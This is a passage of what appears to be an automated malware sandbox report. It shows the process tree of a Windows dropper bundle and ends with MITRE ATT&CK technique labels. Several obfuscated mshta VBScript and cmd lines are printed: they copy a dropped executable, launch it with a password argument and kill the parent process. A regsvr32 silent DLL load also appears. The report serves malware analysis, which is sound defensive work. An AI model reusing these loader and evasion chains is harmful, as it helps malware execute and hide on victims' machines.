        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6988
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3796
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1320
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1176
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3572
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3548
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5052
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1904
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6372
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5048
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1268
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6620
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5744
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2988
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1032
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7016
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2348
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6960
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7116
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3796
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1116
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5092
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6272
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3496
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6392
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1776
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5172
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1636
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6860
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2616
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7016
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5088
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5672
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7216
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7296
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7380
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7472
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7600
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7684
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7804
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7896
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7920
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7996
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8080
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5064
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4680
      - C:\ProgramData\6186043.exe
        
        "C:\ProgramData\6186043.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5280
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:4560
      - C:\ProgramData\4245277.exe
        
        "C:\ProgramData\4245277.exe"
        6⤵
        Executes dropped EXE
        
        PID:6104
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\ProgramData\4245277.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\4245277.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )
        7⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\4245277.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\4245277.exe" ) do taskkill /Im "%~NxB" /F
        8⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE
        
        GZ9~4QZ~O.EXe -P6_oIH__Ioj5q
        9⤵
        Executes dropped EXE
        
        PID:5200
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )
        10⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F
        11⤵
        
        PID:772
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S
        10⤵
        Loads dropped DLL
        
        PID:428
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /Im "4245277.exe" /F
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4348
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue112c483dd3245d.exe
        
        Tue112c483dd3245d.exe
        5⤵
        Executes dropped EXE
        
        PID:1212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 288
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      PID:4968
    - - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 1884
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5908

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.2
1⤵
- Modifies data under HKEY_USERS
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4552 -ip 4552
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3928 -ip 3928
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1212 -ip 1212
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3876

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
PID:5748
- C:\Users\Admin\AppData\Local\Temp\is-00EGL.tmp\setup_2.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-00EGL.tmp\setup_2.tmp" /SL5="$2016E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  PID:5892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4536 -ip 4536
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5688

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6088
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6136
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 452
    3⤵
    - Program crash
    PID:5304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6136 -ip 6136
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1724

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 5296 -ip 5296
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5236 -ip 5236
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5416 -ip 5416
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5248

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5496
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:3752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 460
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3752 -ip 3752
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2472 -ip 2472
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5348

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 4164 -ip 4164
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3188 -ip 3188
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4080

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3168
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9480D68A6E0FA94A97BEDFA766B518E3 C
  2⤵
  - Loads dropped DLL
  PID:4540
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1AC1209B019E0066D851DBAFF1BA7207
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:2248
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:3872
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 78BF68954BB458C15AA5E33F1F8A4930 E Global\MSI0000
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5188 -ip 5188
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5440

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5340
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5524
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 452
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5524 -ip 5524
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:1248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1020 -ip 1020
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2784 -ip 2784
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5476 -ip 5476
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4200

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery